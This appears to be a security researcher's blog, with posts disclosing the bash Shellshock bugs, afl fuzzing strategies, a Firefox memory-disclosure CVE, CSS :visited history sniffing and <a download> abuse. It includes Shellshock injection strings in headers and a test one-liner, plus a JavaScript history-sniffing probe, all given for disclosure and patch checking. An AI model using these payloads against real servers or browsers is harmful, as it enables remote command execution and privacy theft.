This is a personal blog. My other stuff: book | home page | Twitter | G+ | CNC robotics | electronics

September 27, 2014

Bash bug: apply Florian's patch now (CVE-2014-6277 and CVE-2014-6278)

OK, rebuild bash and deploy Florian's unofficial patch or its now-upstream version now. If you're a distro maintainer, please consider doing the same.

My previous post has more information about the original vulnerability (CVE-2014-6271). It also explains Tavis' and my original negative sentiment toward the original upstream patch. In short, the revised code did not stop bash from parsing the code seen in potentially attacker-controlled, remotely-originating environmental variables. Instead, the fix simply seeks to harden the parsing to prevent RCE. It relies on two risky assumptions:
  • That, save for the one bug we're fixing now, the process of parsing attacker-controlled functions is guaranteed to have no side effects on the subsequently executed trusted code.

  • That the underlying parser, despite probably not being designed to deal with attacker-supplied inputs, is free from the usual range of C language bugs.
From the very early hours, we have argued on the oss-security mailing list that a more reasonable approach would be to shield the parser from remotely-originating strings. I proposed putting the function export functionality behind a runtime flag or using a separate, prefixed namespace for the exported functions - so that variables such as HTTP_COOKIE do not go through this code path at all. Unfortunately, we made no real progress on that early in the game.

Soon thereafter, people started to bump into additional problems in the parser code. The first assumption behind the patch - the one about the parsing process not having other side effects - was quickly proved wrong by Tavis, who came up with a code construct that would get the parser in an inconsistent state, causing bash to create a bogus file and mangle any subsequent code that /bin/sh is supposed to execute.

This was assigned CVE-2014-7169 and led to a round of high-profile press reports claiming that we're still doomed, with people assigning the new bug CVSS scores all the way up to 11. The reality was a bit more nuanced: the glitch demonstrated by Tavis' code is a bit less concerning, because it does not translate into a universally exploitable RCE - at least not as far as we could figure out. Some uses of /bin/sh would be at risk, but most would just break in a probably-non-exploitable way. The maintainer followed with another patch that locked down this specific hole.

The second assumption started showing cracks, too. First came a report from Todd Sabin, who identified an off-by-one error when parsing more than ten stacked redirects. The bug, assigned CVE-2014-7186, would cause a crash, but given the nature of the underlying assignment, it wasn't particularly clear if this created an immediately exploitable security risk. Another similarly ambiguous off-by-one issue with line counting in loops cropped up shortly thereafter (CVE-2014-7187).

The two latter issues did not have an officially released upstream patch at that point, but they prompted Florian Weimer of Red Hat to develop an unofficial patch that takes the seemingly more durable approach we argued for earlier on: putting function exports in a separate namespace. Florian's fix effectively isolates the function parsing code from attacker-controlled strings in almost all the important use cases we can currently think of.

(One major outlier would be any solutions that rely on blacklisting environmental variables to run restricted shells or restricted commands as a privileged user - sudo-type stuff - but it's a much smaller attack surface and a very dubious security boundary to begin with.)

Well... so, to get to the point: I've been fuzzing the underlying function parser on the side - and yesterday, bumped into a new parsing issue (CVE-2014-6277) that is almost certainly remotely exploitable and made easier to leverage due to the fact that bash is seldom compiled with ASLR. I'll share the technical details later on; for now, I sent the info to the maintainer of bash and to several key Linux distros. In general terms, it's an attempt to access uninitialized memory leading to reads from, and then subsequent writes to, a pointer that is fully within the attacker's control. Here's a pretty telling crash:

  bash[3054]: segfault at 41414141 ip 00190d96 ...

Soon after posting this entry, I also bumped into the sixth and most severe issue so far, essentially permitting very simple and straightforward remote code execution (CVE-2014-6278) on systems that are patched against the first bug. It's a "put your commands here" type of bug, similar to the original report. I will post additional details in a couple of days to give people enough time to upgrade.

At this point, I very strongly recommend manually deploying Florian's patch unless your distro is already shipping it. (Florian's patch has been also finally included upstream shortly after I first posted this entry.)

From within the shell itself, the simplest way to check if you already have it installed would be:

  foo='() { echo not patched; }' bash -c foo

If the command shows "not patched", you don't have the patch and you are still vulnerable to a (currently non-public) RCE, even if you applied the original one (or the subsequent upstream patch that addressed the issue found by Tavis).

Oh, and if it shows "command not found", you're good.

September 25, 2014

Quick notes about the bash bug, its impact, and the fixes so far

We spent a good chunk of the day investigating the now-famous bash bug (CVE-2014-6271), so I had no time to make too many jokes about it on Twitter - but I wanted to jot down several things that have been getting drowned out in the noise earlier in the day.

Let's start with the nature of the bug. At its core, the problem is caused by an obscure and little-known feature that allows bash to export function definitions from a parent shell to child shells, similarly to how you can export normal environmental variables. The functionality in action looks like this:

  $ function foo { echo "hi mom"; }
  $ export -f foo
  $ bash -c 'foo'   # Spawn nested shell, call 'foo'
  hi mom

The behavior is implemented as a hack involving specially-formatted environmental variables: in essence, any variable whose value starts with a literal "() {" will be dispatched to the parser just before executing the main program. You can see this in action here:

  $ foo='() { echo "hi mom"; }' bash -c 'foo'
  hi mom

The concept of granting magical properties to certain values of environmental variables clashes with several ancient customs - most notably, with the tendency for web servers such as Apache to pass client-supplied strings in the environment to any subordinate binaries or scripts. Say, if I request a CGI or PHP script from your server, the env variables $HTTP_COOKIE and $HTTP_USER_AGENT will probably be initialized to the raw values seen in the original request. If the values happen to begin with "() {" and are ever seen by /bin/bash, events may end up taking an unusual turn.
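The server-side half of that hand-off is easy to model. Here is a minimal Python sketch of the CGI naming convention (the function name is mine; real servers such as Apache implement this step internally, in C):

```python
# Illustrative sketch of the CGI convention, not any server's actual code:
# client-supplied request headers become HTTP_* environment variables.
def headers_to_env(headers):
    """Map request headers to CGI-style environment variable names."""
    env = {}
    for name, value in headers.items():
        # Header names are upper-cased, dashes become underscores,
        # and an HTTP_ prefix is added; values pass through verbatim.
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env

env = headers_to_env({"User-Agent": "() { :; }; echo vulnerable",
                      "Cookie": "sid=1234"})
print(env["HTTP_USER_AGENT"])
```

Any process that later hands this environment to /bin/bash exposes the parser to those raw, attacker-supplied values.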

And so, the bug we're dealing with stems from the observation that trying to parse function-like strings received in HTTP_* variables could have some unintended side effects in that shell - namely, it could easily lead to your server executing arbitrary commands trivially supplied in a HTTP header by random people on the Internet.

With that out of the way, it is important to note that today's patch provided by the maintainer of bash does not stop the shell from trying to parse the code within headers that begin with "() {" - it merely tries to get rid of that particular RCE side effect, originally triggered by appending commands past the end of the actual function definition. But even with all the current patches applied, you can still do this:

  Cookie: () { echo "Hello world"; }

...and witness a callable function dubbed HTTP_COOKIE() materialize in the context of subshells spawned by Apache; of course, the name will always be prefixed with HTTP_, so it's unlikely to clash with anything or be called by accident - but intuitively, it's a pretty scary outcome.

In the same vein, doing this will also have an unexpected result:

  Cookie: () { oops

If specified on a request to a bash-based CGI script, this will leave a scary bash syntax error message in your error log.

All in all, the fix hinges on two risky assumptions:
  1. That the bash function parser invoked to deal with variable-originating function definitions is robust and does not suffer from the usual range of low-level C string parsing bugs that almost always haunt similar code - a topic that, when it comes to shells, hasn't been studied in much detail before now. (In fact, I am aware of a privately-made, now-disclosed report of such errors in the parser - CVE-2014-7186 and CVE-2014-7187.)

    Update (Sep 26): I also bumped into what seems to be a separate and probably exploitable use of an uninitialized pointer in the parser code; shared the details privately upstream.
  2. That the parsing steps are guaranteed to have no global side effects within the child shell. As it happens, this assertion has been already proved wrong by Tavis (CVE-2014-7169); the side effect he found probably-maybe isn't devastating in the general use case (at least until the next stroke of brilliance), but it's certainly a good reason for concern.

    Update (Sep 27): Found a sixth and most severe issue that is essentially equivalent to the original RCE on all systems that only have the original, maintainer-provided patch.

Contrary to multiple high-profile reports, the original fix was not "broken" in the sense that there is no universal RCE exploit for it - but if I were a betting man, I would not bet on the patch holding up in the long haul (Update: as noted above, it did not hold up). A more reasonable solution would involve temporarily disabling function imports, putting them behind a runtime flag, or blacklisting some of the most dangerous variable patterns (e.g., HTTP_*); and later on, perhaps moving to a model where function exports use a distinct namespace while present in the environment.

What else? Oh, of course: the impact of this bug is an interesting story all in itself. At first sight, the potential for remote exploitation should be limited to CGI scripts that start with #!/bin/bash and to several other programs that explicitly request this particular shell. But there's a catch: on a good majority of modern Linux systems, /bin/sh is actually a symlink to /bin/bash!

This means that web apps written in languages such as PHP, Python, C++, or Java, are likely to be vulnerable if they ever use libcalls such as popen() or system(), all of which are backed by calls to /bin/sh -c '...'. There is also some added web-level exposure through #!/bin/sh CGI scripts, <!--#exec cmd="..."> calls in SSI, and possibly more exotic vectors such as mod_ext_filter.
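To see that dependency in action, here is a small Python illustration (assuming a POSIX system with /bin/sh): shell=True routes the command through /bin/sh -c '...', the same mechanism that backs C's system() and popen(), and environment variables set by the parent flow straight into that shell:

```python
import os
import subprocess

# Minimal illustration: with shell=True, Python runs the command via
# "/bin/sh -c '...'" - the same path taken by system() and popen() - and
# the parent's environment travels into that shell untouched.
child_env = dict(os.environ, GREETING="hello from the parent")
result = subprocess.run('echo "$GREETING"', shell=True, env=child_env,
                        capture_output=True, text=True)
print(result.stdout.strip())
```

On systems where /bin/sh is really bash, every such call gives the function-import code a chance to look at the environment.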

For the same reason, userland DHCP clients that invoke configuration scripts and use variables to pass down config details are at risk when exposed to rogue servers (e.g., on open wifi). A handful of MTAs, MUAs, or FTP server architectures may be also of concern - in particular, there are third-party reports of qmail installations being at risk. Finally, there is some exposure for environments that use restricted SSH shells (possibly including Git) or restricted sudo commands, but the security of such approaches is typically fairly modest to begin with.

Exposure on other fronts is possible, but probably won't be as severe. The worries around PHP and other web scripting languages, along with the concern for userspace DHCP, are the most significant reasons to upgrade - and perhaps to roll out more paranoid patches, rather than relying solely on the two official ones. On the upside, you don't have to worry about non-bash shells - and that covers a good chunk of embedded systems out there. In particular, contrary to several claims, Busybox should be fine.

Update (Sep 28): the previously-unofficial namespace isolation patch from Florian has eventually made it upstream. You should deploy that patch ASAP.

PS. As for the inevitable "why hasn't this been noticed for 15 years" / "I bet the NSA knew about it" stuff - my take is that it's a very unusual bug in a very obscure feature of a program that researchers don't really look at, precisely because no reasonable person would expect it to fail this way. So, life goes on.

September 02, 2014

CVE-2014-1564: Uninitialized memory with truncated images in Firefox

The recent release of Firefox 32 fixes another interesting image parsing issue found by american fuzzy lop: following a refactoring of memory management code, the past few versions of the browser ended up using uninitialized memory for certain types of truncated images, which is easily measurable with a simple <canvas> + toDataURL() harness that examines all the fuzzer-generated test cases.

In general, problems like that may leak secrets across web origins, or more prosaically, may help attackers bypass security measures such as ASLR. For a slightly more detailed discussion, check out this post.

Here's a short proof-of-concept that should work if you haven't updated to 32 yet. This is tracked as CVE-2014-1564, Mozilla bug 1045977. Several more should be coming soon.

Some notes on web tracking and related mechanisms

Artur Janc and I put together a nice, in-depth overview of all the known fingerprinting and tracking vectors that appear to be present in modern browsers. This is an interesting, polarizing, and poorly-studied area; my main hope is that the doc will bring some structure to the discussions of privacy consequences of existing and proposed web APIs - and help vendors and standards bodies think about potential solutions in a more holistic way.

That's it - carry on!

August 08, 2014

Binary fuzzing strategies: what works, what doesn't

Successful fuzzers live and die by their fuzzing strategies. If the changes made to the input file are too conservative, the fuzzer will achieve very limited coverage. If the tweaks are too aggressive, they will cause most inputs to fail parsing at a very early stage, wasting CPU cycles and spewing out messy test cases that are difficult to investigate and troubleshoot.

Designing the mutation engine for a new fuzzer has more to do with art than science. But one of the interesting side effects of the design of american fuzzy lop is that it provides a rare feedback loop: you can carefully measure what types of changes to the input file actually result in the discovery of new branches in the code, and which ones just waste your time or money.

This data is particularly easy to read because the fuzzer also approaches every new input file by going through a series of progressively more complex, but exhaustive and deterministic fuzzing strategies - say, sequential bit flips and simple arithmetics - before diving into purely random behaviors. The reason for this is the desire to generate the simplest and most elegant test cases first; but the design also provides a very good way to quantify how much value each new strategy brings to the table - and whether we need it at all.

The measurements of afl fuzzing efficiency for reasonably-sized test cases are remarkably consistent across a variety of real-world binary formats - anything ranging from image files (JPEG, PNG, GIF, WebP) to archives (gzip, xz, tar) - and because of this, I figured that sharing the data more broadly will be useful to folks who are working on fuzzers of their own. So, let's dive in:
  • Walking bit flips: the first and most rudimentary strategy employed by afl involves performing sequential, ordered bit flips. The stepover is always one bit; the number of bits flipped in a row varies from one to four. Across a large and diverse corpus of input files, the observed yields are:

    • Flipping a single bit: ~70 new paths per one million generated inputs,
    • Flipping two bits in a row: ~20 additional paths per million generated inputs,
    • Flipping four bits in a row: ~10 additional paths per million inputs.

    (Note that the counts for every subsequent pass include only the paths that could not have been discovered by the preceding strategy.)

    Of course, the strategy is relatively expensive, with each pass requiring eight execve() calls per every byte of the input file. With the returns diminishing rapidly, afl stops after these three passes - and switches to a second, less expensive strategy past that point.
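For illustration, the three passes above can be modeled in a few lines of Python (the function name and structure are mine, not afl's actual implementation):

```python
# A simplified model of afl's walking bit flips: invert runs of 1, 2, or 4
# consecutive bits with a constant stepover of one bit.
def walking_bitflips(data, width):
    """Yield copies of 'data' with 'width' consecutive bits inverted."""
    nbits = len(data) * 8
    for pos in range(nbits - width + 1):
        out = bytearray(data)
        for bit in range(pos, pos + width):
            out[bit // 8] ^= 0x80 >> (bit % 8)   # MSB-first bit ordering
        yield bytes(out)

# A two-byte input has 16 bit positions, hence 16 single-bit variants.
variants = list(walking_bitflips(b"\x00\x00", 1))
print(len(variants))
```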

  • Walking byte flips: a natural extension of the walking bit flip approach, this method relies on 8-, 16-, or 32-bit wide bitflips with a constant stepover of one byte. This strategy discovers around ~30 additional paths per million inputs, on top of what could have been triggered with shorter bit flips.

    It should be fairly obvious that each pass takes approximately one execve() call per one byte of the input file, making it surprisingly cheap, but also limiting its potential yields in absolute terms.

  • Simple arithmetics: to trigger more complex conditions in a deterministic fashion, the third stage employed by afl attempts to subtly increment or decrement existing integer values in the input file; this is done with a stepover of one byte. The experimentally chosen range for the operation is -35 to +35; past these bounds, fuzzing yields drop dramatically. In particular, the popular option of sequentially trying every single value for each byte (equivalent to arithmetics in the range of -128 to +127) helps very little and is skipped by afl.

    When it comes to the implementation, the stage consists of three separate operations. First, the fuzzer attempts to perform subtraction and addition on individual bytes. With this out of the way, the second pass involves looking at 16-bit values, using both endians - but incrementing or decrementing them only if the operation would have also affected the most significant byte (otherwise, the operation would simply duplicate the results of the 8-bit pass). The final stage follows the same logic, but for 32-bit integers.

    The yields for this method vary depending on the format - ranging from ~2 additional paths per million in JPEG to ~8 per million in xz. The cost is relatively high, averaging around 20 execve() calls per one byte of the input file - but can be significantly improved with only a modest impact on path coverage by sticking to +/- 16.
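A rough sketch of the 16-bit portion of this stage (the bounds mirror the description above, but the code and names are mine, not afl's):

```python
import struct

# A rough model of the 16-bit arithmetic pass: try small increments and
# decrements in both endians, but keep a result only if it also changes
# the most significant byte - otherwise the 8-bit pass already covered it.
def arith16(data, max_delta=35):
    for pos in range(len(data) - 1):
        for fmt in ("<H", ">H"):
            (orig,) = struct.unpack_from(fmt, data, pos)
            for delta in range(-max_delta, max_delta + 1):
                if delta == 0:
                    continue
                new = (orig + delta) & 0xFFFF
                if (new >> 8) == (orig >> 8):   # MSB unchanged: skip
                    continue
                out = bytearray(data)
                struct.pack_into(fmt, out, pos, new)
                yield bytes(out)

# 0x00FF + 1 carries into the high byte, so the variant is kept.
print(any(v == b"\x00\x01\x00" for v in arith16(b"\xff\x00\x00")))
```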

  • Known integers: the last deterministic approach employed by afl relies on a hardcoded set of integers chosen for their demonstrably elevated likelihood of triggering edge conditions in typical code (e.g., -1, 256, 1024, MAX_INT-1, MAX_INT). The fuzzer uses a stepover of one byte to sequentially overwrite existing data in the input file with one of the approximately two dozen "interesting" values, using both endians (the writes are 8-, 16-, and 32-bit wide).

    The yields for this stage are between 2 and 5 additional paths per one million tries; the average cost is roughly 30 execve() calls per one byte of input file.
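A toy version of this stage, with a deliberately abbreviated value list, might look like this:

```python
import struct

# A toy "interesting values" stage: overwrite data at each byte offset
# with known boundary integers, 16 bits wide, in both endians. The value
# list here is a small subset chosen for illustration.
INTERESTING_16 = [-1, 256, 1024, 32767, -32768]

def known_ints16(data):
    for pos in range(len(data) - 1):
        for val in INTERESTING_16:
            for fmt in ("<h", ">h"):
                out = bytearray(data)
                struct.pack_into(fmt, out, pos, val)
                yield bytes(out)

outs = set(known_ints16(b"\x00\x00\x00"))
print(b"\xff\xff\x00" in outs)   # -1 written at offset 0
```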

  • Stacked tweaks: with deterministic strategies exhausted for a particular input file, the fuzzer continues with a never-ending loop of randomized operations that consist of a stacked sequence of:

    • Single-bit flips,
    • Attempts to set "interesting" bytes, words, or dwords (both endians),
    • Addition or subtraction of small integers to bytes, words, or dwords (both endians),
    • Completely random single-byte sets,
    • Block deletion,
    • Block duplication via overwrite or insertion,
    • Block memset.

    Based on a fair amount of testing, the optimal execution path yields appear to be achieved when the probability of each operation is roughly the same; the number of stacked operations is chosen as a power-of-two between 1 and 64; and the block size for block operations is capped at around 1 kB.

    The absolute yield for this stage is typically comparable or higher than the total number of execution paths discovered by all deterministic stages earlier on.
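A bare-bones sketch of such a loop, with a much-simplified operation mix (the parameters here are illustrative guesses, not afl's exact values):

```python
import random

# A minimal "stacked tweaks" loop: apply a random power-of-two number of
# randomly chosen mutations in a row. Only three of the listed operations
# are modeled here, for brevity.
def havoc(data, rng):
    out = bytearray(data)
    for _ in range(2 ** rng.randint(0, 6)):    # 1..64 stacked operations
        op = rng.randrange(3)
        if op == 0 and out:                    # flip a single bit
            pos = rng.randrange(len(out) * 8)
            out[pos // 8] ^= 0x80 >> (pos % 8)
        elif op == 1 and out:                  # set a random byte
            out[rng.randrange(len(out))] = rng.randrange(256)
        elif op == 2 and len(out) > 1:         # delete a short block
            pos = rng.randrange(len(out) - 1)
            del out[pos:pos + rng.randint(1, min(4, len(out) - pos))]
    return bytes(out)

rng = random.Random(1)
print(len(havoc(b"A" * 32, rng)) <= 32)
```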

  • Test case splicing: this is a last-resort strategy that involves taking two distinct input files from the queue that differ in at least two locations, and splicing them at a random location in the middle before sending this transient input file through a short run of the "stacked tweaks" algorithm. This strategy usually discovers around 20% additional execution paths that are unlikely to be triggered by the previous operation alone.

    (Of course, this method requires a good, varied corpus of input files to begin with; afl generates one automatically, but for other tools, you may have to construct it manually.)
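The splicing step itself is simple; a hypothetical sketch:

```python
import random

# A hypothetical sketch of test case splicing: join the head of one queue
# entry with the tail of another at a random crossover point. The real
# fuzzer would then pass the result through the "stacked tweaks" stage.
def splice(a, b, rng):
    point = rng.randint(1, min(len(a), len(b)) - 1)
    return a[:point] + b[point:]

rng = random.Random(7)
child = splice(b"AAAAAAAA", b"BBBBBBBB", rng)
print(child)
```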

As you can see, deterministic block operations (duplication, splicing) are not attempted in an exhaustive fashion; this is because they generally require quadratic time (or worse) - so while their yields may be good for very short inputs, they degrade very quickly.

Well, that's it! If you ever decide to try out afl, you can watch these and other cool stats on your screen in real time.

August 04, 2014

A bit more about american fuzzy lop

Fuzzing is one of the most powerful strategies for identifying security issues in real-world software. Unfortunately, it also offers fairly shallow coverage: it is impractical to exhaustively cycle through all possible inputs, so even something as simple as setting three separate bytes to a specific value to reach a chunk of unsafe code can be an insurmountable obstacle to a typical fuzzer.

There have been numerous attempts to solve this problem by augmenting the process with additional information about the behavior of the tested code. These techniques can be divided into three broad groups:
  • Simple coverage maximization. This approach boils down to trying to isolate initial test cases that offer diverse code coverage in the targeted application - and then fuzzing them using conventional techniques.

  • Control flow analysis. A more sophisticated technique that leverages instrumented binaries to focus the fuzzing efforts on mutations that generate distinctive sequences of conditional branches within the instrumented binary.

  • Static analysis. An approach that attempts to reason about potentially interesting states within the tested program and then make educated guesses about the input values that could possibly trigger them.
The first technique is surprisingly powerful when used to pre-select initial test cases from a massive corpus of valid data - say, the result of a large-scale web crawl. Unfortunately, coverage measurements provide only a very simplistic view of the internal state of the program, making them less suited for creatively guiding the fuzzing process later on.

The latter two techniques are extremely promising in experimental settings. That said, in real-world applications, they are not only very slow, but frequently lead to irreducible complexity: most of the high-value targets will have a vast number of internal states and possible execution paths, and deciding which ones are interesting and substantially different from the rest is an extremely difficult challenge that, if not solved, usually causes the "smart" fuzzer to perform no better than a traditional one.

American fuzzy lop tries to find a reasonable middle ground between sophistication and practical utility. In essence, it's a fuzzer that relies on a form of Markov chains to detect subtle, local-scale changes to program control flow without having to perform complex global-scale comparisons between series of long and winding execution traces - a common failure point for similar tools.

In almost-plain English, the fuzzer does this by instrumenting every effective line of C or C++ code (or any other GCC-supported language) to record a tuple in the following format:

[ID of current code location], [ID of previously-executed code location]

The ordering information for tuples is discarded; the primary signal used by the fuzzer is the appearance of a previously-unseen tuple in the output dataset; this is also coupled with a coarse magnitude count for tuple hit rate. This method combines the self-limiting nature of simple coverage measurements with the sensitivity of control flow analysis. It detects both explicit conditional branches and indirect variations in the behavior of the tested app.
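A simplified model of this signal - recording edge tuples with bucketed hit counts and flagging anything previously unseen - might look like this (the bucket thresholds are illustrative, not afl's exact values):

```python
# A simplified model of the coverage signal: collect (previous location,
# current location) tuples from an execution trace, bucket hit counts
# into coarse magnitudes, and report anything not seen before.
def bucket(count):
    for limit in (1, 2, 3, 4, 8, 16, 32):
        if count <= limit:
            return limit
    return 128

def trace_to_tuples(trace):
    """Turn a list of code-location IDs into bucketed edge tuples."""
    hits = {}
    for prev, cur in zip(trace, trace[1:]):
        hits[(prev, cur)] = hits.get((prev, cur), 0) + 1
    return {(edge, bucket(n)) for edge, n in hits.items()}

global_map = trace_to_tuples([1, 2, 3])
new = trace_to_tuples([1, 2, 4]) - global_map   # only edge (2, 4) is new
print(sorted(new))
```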

The output from this instrumentation is used as a part of a simple, vaguely "genetic" algorithm:
  1. Load user-supplied initial test cases into the queue,

  2. Take input file from the queue,

  3. Repeatedly mutate the file using a balanced variety of traditional fuzzing strategies (see later),

  4. If any of the generated mutations resulted in a new tuple being recorded by the instrumentation, add mutated output as a new entry in the queue.

  5. Go to 2.
The discovered test cases are also periodically culled to eliminate ones that have been made obsolete by more inclusive finds discovered later in the fuzzing process. Because of this, the fuzzer is not only useful for identifying crashes, but also exceptionally effective at turning a single valid input file into a reasonably-sized corpus of interesting test cases that can be manually investigated for non-crashing problems, handed over to valgrind, or used to stress-test applications that are harder to instrument or too slow to fuzz efficiently. In particular, it can be extremely useful for generating small test sets that may be programmatically or manually examined for anomalies in a browser environment.
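The loop above can be sketched end-to-end with a stand-in for the instrumentation (here, the "coverage tuples" of an input are just its set of distinct byte values - a toy placeholder, not a real signal):

```python
import random

# A toy end-to-end version of the queue algorithm described above.
def run_target(data):
    return set(data)                        # stand-in "coverage tuples"

def fuzz(seeds, iterations, rng):
    queue = list(seeds)
    seen = set()
    for item in queue:                      # step 1: load initial cases
        seen |= run_target(item)
    for _ in range(iterations):
        parent = rng.choice(queue)          # step 2: take a queue entry
        mutated = bytearray(parent)         # step 3: mutate it
        mutated[rng.randrange(len(mutated))] = rng.randrange(256)
        cov = run_target(bytes(mutated))
        if cov - seen:                      # step 4: keep novel inputs
            seen |= cov
            queue.append(bytes(mutated))
    return queue                            # step 5 is the loop itself

rng = random.Random(0)
queue = fuzz([b"\x00\x00\x00\x00"], 200, rng)
print(len(queue) > 1)
```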

(For a quick partial demo, click here.)

Of course, there are countless "smart" fuzzer designs that look good on paper, but fail in real-world applications. I tried to make sure that this is not the case here: for example, afl can easily tackle security-relevant and tough targets such as gzip, xz, lzo, libjpeg, libpng, giflib, libtiff, or webp - all with absolutely no fine-tuning and while running at blazing speeds. The control flow information is also extremely useful for accurately de-duping crashes, so the tool does that for you.

In fact, I spent some time running it on a single machine against libjpeg, giflib, and libpng - some of the most robust, best-tested image parsing libraries out there. So far, the tool found:
  • CVE-2013-6629: JPEG SOS component uninitialized memory disclosure in jpeg6b and libjpeg-turbo,

  • CVE-2013-6630: JPEG DHT uninitialized memory disclosure in libjpeg-turbo,

  • MSRC 0380191: A separate JPEG DHT uninitialized memory disclosure in Internet Explorer (pending with vendor),

  • CVE-2014-1564: Uninitialized memory disclosure via GIF images in Firefox,

  • Mozilla bug #1063733: Another uninitialized memory disclosure in Firefox (pending with vendor),

  • Chromium bug #398235, Mozilla bug #1050342: Probable library-related JPEG security issues in Chrome and Firefox (pending),

  • PNG zlib API misuse bug in MSIE (DoS-only),

  • Several browser-crashing images in WebKit browsers (DoS-only).
More is probably to come. In other words, you should probably try it out. The most significant limitation today is that the current fuzzing strategies are optimized for binary files; the fuzzer does:
  • Walking bitflips - 1, 2, and 4 bits,

  • Walking byte flips - 1, 2, and 4 bytes,

  • Walking addition and subtraction of small integers - byte, word, dword (both endians),

  • Walking insertion of interesting integers (-1, MAX_INT, etc) - byte, word, dword (both endians),

  • Random stacked flips, arithmetics, block cloning, insertion, deletion, etc,

  • Random splicing of synthesized test cases - pretty unique!
All these strategies have been specifically selected for an optimal balance between fuzzing cost and yields measured in terms of the number of discovered execution paths with binary formats; for highly-redundant text-based formats such as HTML or XML, syntax-aware strategies (template- or ABNF-based) will obviously yield better results. Plugging them into AFL would not be hard, but requires work.

June 22, 2014

Boolean algebra with CSS (when you can only set colors)

Depending on how you look at it, CSS can be considered Turing-complete. But in one privacy-relevant setting - when styling :visited links - the set of CSS directives you can use is extremely limited, effectively letting you control not much more than the color of the text nested between <a href=...> and </a>. Can you perform any computations with that?

Well, as it turns out, you can - in a way. Check out this short write-up for a discussion on how to implement Boolean algebra by exploiting an interesting implementation-level artifact of CSS blending to steal your browsing history a bit more efficiently than before.

Vulnerability logo and vanity domain forthcoming - stay tuned.

March 20, 2014

Messing around with <a download>

Not long ago, the HTML5 specification extended the semantics for <a href=...> links by adding the download attribute. In a nutshell, the markup allows you to specify that an outgoing link should always be treated as a download, even if the hosting site does not serve the file with Content-Disposition: attachment:

<a href="" download>What a cute kitty!</a>

I am unconvinced that this feature scratches any real itch for HTTP links, but it's already supported in Firefox, Chrome, and Opera.

Of course, there are some kinks: in the absence of the Content-Disposition header, the browser needs to figure out the correct file name for the download. In practice, this is always done based on the path seen in the URL. That's not great, because a good majority of web frameworks will tolerate trailing garbage in the path segment; indeed, so does the site in this example. Let's try it out:

<a href="" download>What a cute kitty!</a>

But we shouldn't dwell on this, because the download syntax makes it easy for the originating page to simply override that logic and pick any file name and extension it likes:

<a href="" download="KittyViewer.exe">What a cute kitty!</a>

That's odd - and keep in mind that the image we are seeing is at least partly user-controlled. A location like this can be found on any major destination on the Internet: if not an image, you can always find a JSON API or a HTML page that echoes something back.

It also helps to remember that it's usually pretty trivial to build files that are semantically valid to more than one parser, and have a different meaning to each one of them. Let's put it all together for a trivial PoC:

<a href=""
  download="AltavistaToolbar.bat">Download Bing toolbar from</a>

That's pretty creepy: if you download the file on Windows and click "open", the payload will execute and invoke notepad.exe. Still, is it a security bug? Well... the answer to that is not very clear.

For one, there is a temptation to trust the tooltip you see when you hover over a download link. But if you do that, you are in serious trouble, even in absence of that whole download bit: JavaScript code can intercept the onclick event and take you somewhere else. Luckily, most browsers provide you with a real security indicator later on: the download UI in Internet Explorer, Firefox, and Safari prominently shows the origin from which the document is being retrieved. And that's where the problem becomes fairly evident: the origin site never really meant to serve you with an attacker-controlled AltavistaToolbar.bat, but the browser says otherwise.

The story gets even more complicated when you consider that some browsers don't show the origin of the download in the UI at all; this is the case for Chrome and Opera. In such a design, you simply have to put all your faith in the origin from which you initiated the download. In principle, it's not a completely unreasonable notion, although I am not sure it aligns with user expectations particularly well. Sadly, there are other idiosyncrasies of the browser environment that mean the download you are seeing on a trusted page might have been initiated from another, unrelated document. Oops.

So, yes, browsers are messy. Over the past few years, I have repeatedly argued against <a download> on the standards mailing lists (most recently in 2013), simply because I think that nothing good comes out of suddenly taking the control over how documents are interpreted by the browser away from the hosting site. I don't think that my arguments were particularly persuasive, in part because nobody seemed to have a clear vision for the overall trust model around downloads on the Web.

PS. Interestingly, Firefox decided against the added exposure and implemented the semantics in a constrained way: the download attribute is honored only if the final download location is same-origin with the referring URL.

November 12, 2013

american fuzzy lop

Well, it's been a while, but I'm happy to announce a new fuzzing tool, aptly named american fuzzy lop. In essence, it's a practical (!) fuzzer for binary data formats that achieves great coverage and automatically synthesizes unique and interesting test cases based on a much smaller set of input files.

For an example of a bug found with afl, check out this advisory. Peace out.

May 04, 2013

And on a completely unrelated note...

...I think it's hilarious to mix several completely unrelated interests that appeal to very disjoint audiences on a single blog, so here is another article that I have recently written for MAKE: "Resin Casting: Going from CAD to Engineering-Grade Parts".

In my earlier article written for their blog, I expressed an opinion that some of the most pervasive barriers to home manufacturing do not lie with the availability of cutting-edge tools - but rather, with a very limited awareness of the well-established design and manufacturing processes that lead to durable, aesthetic, and functional parts.

The new article sheds some light on one of the best ways to progress from CNC-machined or 3D-printed shapes to components that match or outperform high-end injection-molded prototypes. In the extremely unlikely case that this is of any interest to you - enjoy!

Some harmless, old-fashioned fun with CSS

Several years ago, the CSS :visited pseudo-selector caused a bit of a ruckus: a malicious web page could display a large set of links to assorted destinations on the Internet, and then peek at how they were rendered to get a snapshot of your browsing history.

Several browser vendors addressed this problem by severely constraining the styling available from within the :visited selector, essentially letting you specify text color and not much more. They also limited the visibility of the styled attributes through APIs such as window.getComputedStyle(). This fix still permitted your browsing history to be examined through mechanisms such as cache timing or the detection of 40x responses for authentication-requiring scripts and images from a variety of websites. Nevertheless, it significantly limited the scale of the probing you could perform in a reliable and non-disruptive way.
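The pre-mitigation attack boils down to a few lines of JavaScript. Here is a minimal sketch; the visited-link color, the probe URL handling, and the helper names are mine, not lifted from any particular exploit:

```javascript
// Classic :visited sniffing, as it worked before the mitigations.
// Assumes the page carries a stylesheet with: a:visited { color: red }
const VISITED_COLOR = 'rgb(255, 0, 0)';

// Pure helper: classify a computed color string.
function wasVisited(computedColor) {
  return computedColor === VISITED_COLOR;
}

// Browser-only probe; guarded so the helper above stays testable.
function probeUrl(url) {
  if (typeof document === 'undefined') return null;  // not in a browser
  const link = document.createElement('a');
  link.href = url;
  document.body.appendChild(link);
  const color = getComputedStyle(link).color;
  link.remove();
  return wasVisited(color);
}
```

Post-mitigation, getComputedStyle() simply lies about :visited styling, which is exactly why later attacks had to move to side channels and user interaction.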

Of course, many researchers have pointed out the obvious: that if you can convince the user to interact with your website, you can probably tell what color he is seeing without asking directly. A couple of extremely low-throughput attacks along these lines have been demonstrated in the past - for example, the CAPTCHA trick proposed by Collin Jackson.

So, my belated entry for this contest is this JavaScript clone of "Asteroids". It has a couple of interesting properties:
  • It's not particularly outlandish or constrained - at least compared to the earlier PoCs with CAPTCHAs or chess boards.

